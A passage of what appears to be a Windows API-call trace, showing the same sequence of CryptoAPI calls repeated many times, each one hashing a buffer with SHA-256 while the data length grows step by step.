dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.682] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.682] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x120, dwFlags=0x0) returned 1 [0119.682] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.682] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.682] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.682] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.682] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x140, dwFlags=0x0) returned 1 [0119.682] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.682] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.682] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.683] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.683] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x160, dwFlags=0x0) returned 1 [0119.683] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.683] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.683] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.684] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.684] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x180, dwFlags=0x0) returned 1 [0119.684] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.684] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.684] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.684] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.684] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0119.684] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.684] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.684] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.685] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.685] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0119.685] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.685] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.685] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.685] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.685] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0119.685] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.686] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.686] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.686] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.686] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x200, dwFlags=0x0) returned 1 [0119.686] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.686] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.686] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.687] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.687] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x220, dwFlags=0x0) returned 1 [0119.687] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.687] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.687] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.687] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.687] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x240, dwFlags=0x0) returned 1 [0119.687] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.687] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.687] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.688] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.688] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x260, dwFlags=0x0) returned 1 [0119.688] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.688] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.688] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.688] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.689] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x280, dwFlags=0x0) returned 1 [0119.689] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.689] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.689] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.689] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.689] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0119.689] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.689] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.689] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.690] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.690] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0119.690] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.690] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.690] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.690] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.690] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0119.690] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.691] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.691] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.691] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.691] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x300, dwFlags=0x0) returned 1 [0119.691] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.691] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.691] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.692] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.692] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x320, dwFlags=0x0) returned 1 [0119.692] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.692] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.692] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.692] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.692] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x340, dwFlags=0x0) returned 1 [0119.693] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.693] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.693] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.693] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.693] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x360, dwFlags=0x0) returned 1 [0119.694] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.694] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.694] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.694] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.694] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x380, dwFlags=0x0) returned 1 [0119.694] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.694] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.694] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.695] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.695] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0119.695] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.695] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.695] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.695] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.695] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0119.695] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.695] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.695] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.696] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.696] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0119.696] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.696] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.696] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.697] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.697] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x400, dwFlags=0x0) returned 1 [0119.697] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.697] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.697] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.697] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.697] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x420, dwFlags=0x0) returned 1 [0119.697] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.697] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.697] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.698] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.698] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x440, dwFlags=0x0) returned 1 [0119.698] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.698] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.698] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.698] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.698] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x460, dwFlags=0x0) returned 1 [0119.698] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.698] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.698] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.699] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.699] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x480, dwFlags=0x0) returned 1 [0119.699] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.699] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.699] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.699] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.700] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0119.700] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.700] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.700] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.700] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.700] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0119.700] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.700] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.700] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.701] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.701] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0119.701] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.701] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.701] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.701] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.701] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x500, dwFlags=0x0) returned 1 [0119.701] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.702] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.702] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.702] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.702] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x520, dwFlags=0x0) returned 1 [0119.702] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.702] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.702] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.703] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.703] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x540, dwFlags=0x0) returned 1 [0119.703] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.703] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.703] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.703] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.703] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x560, dwFlags=0x0) returned 1 [0119.703] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.703] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.703] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.704] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.704] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x580, dwFlags=0x0) returned 1 [0119.704] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.704] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.704] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.705] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.705] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0119.705] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.705] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.705] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.705] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.705] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0119.705] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.705] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.705] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.706] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.706] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0119.706] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.706] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.706] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.706] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.706] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x600, dwFlags=0x0) returned 1 [0119.707] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.707] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.707] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.707] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.707] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x620, dwFlags=0x0) returned 1 [0119.707] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.707] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.707] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.708] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.708] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x640, dwFlags=0x0) returned 1 [0119.708] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.708] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.708] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.708] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.708] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x660, dwFlags=0x0) returned 1 [0119.708] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.708] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.708] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.709] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.709] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x680, dwFlags=0x0) returned 1 [0119.709] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.709] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.709] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.710] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.710] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0119.710] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.710] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.710] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.711] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.711] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0119.711] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.711] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.711] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.712] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.712] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0119.712] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.712] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.712] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.712] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.712] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0x700, dwFlags=0x0) returned 1 [0119.712] CryptDestroyHash 